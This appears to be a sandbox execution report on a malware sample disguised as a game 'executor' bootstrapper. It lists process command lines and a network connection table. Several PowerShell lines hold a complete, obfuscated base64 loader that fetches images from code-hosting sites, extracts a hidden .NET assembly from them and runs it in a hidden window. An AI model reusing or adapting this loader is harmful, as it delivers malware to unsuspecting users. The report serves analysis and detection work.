gBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#Jw#g#HQ#e#B0#C4#c#BB#Gk#c#Bt#GI#Zw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBN#HM#YgB1#Gk#b#Bk#Cc#L##g#Cc#M##n#Ck#KQB9#H0#';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\671cd2b750753.vbs"
C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe
"C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c 671cd2b750753.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#Jw#g#HQ#e#B0#C4#c#BB#Gk#c#Bt#GI#Zw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBN#HM#YgB1#Gk#b#Bk#Cc#L##g#Cc#M##n#Ck#KQB9#H0#';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\671cd2b750753.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#Jw#g#HQ#e#B0#C4#c#BB#Gk#c#Bt#GI#Zw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBN#HM#YgB1#Gk#b#Bk#Cc#L##g#Cc#M##n#Ck#KQB9#H0#';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=11908 -childID 68 -isForBrowser -prefsHandle 9248 -prefMapHandle 8856 -prefsLen 28690 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {70480987-bca7-4624-bbe2-51b6691dc927} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | data-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| GB | 172.165.69.228:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | data-edge.smartscreen.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
| GB | 2.18.27.76:443 | www.bing.com | tcp |
| GB | 2.18.27.76:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 76.27.18.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:9229 | tcp | |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 51.11.108.188:443 | checkappexec.microsoft.com | tcp |
| N/A | 127.0.0.1:52841 | tcp | |
| US | 8.8.8.8:53 | 188.108.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| N/A | 127.0.0.1:52848 | tcp | |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 233.18.32.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:9229 | tcp | |
| US | 8.8.8.8:53 | support.mozilla.org | udp |
| US | 34.149.128.2:443 | support.mozilla.org | tcp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 2.128.149.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | solaraweb.vercel.app | udp |
| US | 76.76.21.142:80 | solaraweb.vercel.app | tcp |
| US | 8.8.8.8:53 | solaraweb.vercel.app | udp |
| US | 8.8.8.8:53 | solaraweb.vercel.app | udp |
| US | 76.76.21.142:443 | solaraweb.vercel.app | tcp |
| US | 8.8.8.8:53 | 142.21.76.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| DE | 23.55.161.211:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| GB | 216.58.201.110:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 216.58.201.110:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r5---sn-aigzrn7l.gvt1.com | udp |
| GB | 173.194.5.234:443 | r5---sn-aigzrn7l.gvt1.com | tcp |
| US | 8.8.8.8:53 | r5.sn-aigzrn7l.gvt1.com | udp |
| US | 8.8.8.8:53 | r5.sn-aigzrn7l.gvt1.com | udp |
| GB | 173.194.5.234:443 | r5.sn-aigzrn7l.gvt1.com | udp |
| US | 8.8.8.8:53 | getsolara.dev | udp |
| US | 104.21.93.27:80 | getsolara.dev | tcp |
| US | 104.21.93.27:80 | getsolara.dev | tcp |
| US | 8.8.8.8:53 | getsolara.dev | udp |
| US | 8.8.8.8:53 | getsolara.dev | udp |
| US | 104.21.93.27:443 | getsolara.dev | tcp |
| US | 8.8.8.8:53 | 211.161.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.5.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.93.21.104.in-addr.arpa | udp |
| US | 104.21.93.27:443 | getsolara.dev | udp |
| US | 8.8.8.8:53 | link-hub.net | udp |
| US | 172.67.135.50:443 | link-hub.net | tcp |
| US | 8.8.8.8:53 | link-hub.net | udp |
| US | 8.8.8.8:53 | link-hub.net | udp |
| US | 172.67.135.50:443 | link-hub.net | udp |
| US | 8.8.8.8:53 | linkvertise.com | udp |
| US | 104.22.22.72:443 | linkvertise.com | tcp |
| US | 8.8.8.8:53 | linkvertise.com | udp |
| US | 8.8.8.8:53 | linkvertise.com | udp |
| US | 8.8.8.8:53 | cdn.exmarketplace.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| IT | 95.110.204.9:443 | cdn.exmarketplace.com | tcp |
| US | 8.8.8.8:53 | cdn.exmarketplace.com | udp |
| GB | 142.250.187.226:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 104.22.22.72:443 | linkvertise.com | udp |
| US | 8.8.8.8:53 | cdn.exmarketplace.com | udp |
| IT | 95.110.204.9:443 | cdn.exmarketplace.com | tcp |
| GB | 142.250.187.226:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | use.typekit.net | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | maxst.icons8.com | udp |
| US | 8.8.8.8:53 | stackpath.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | p.typekit.net | udp |
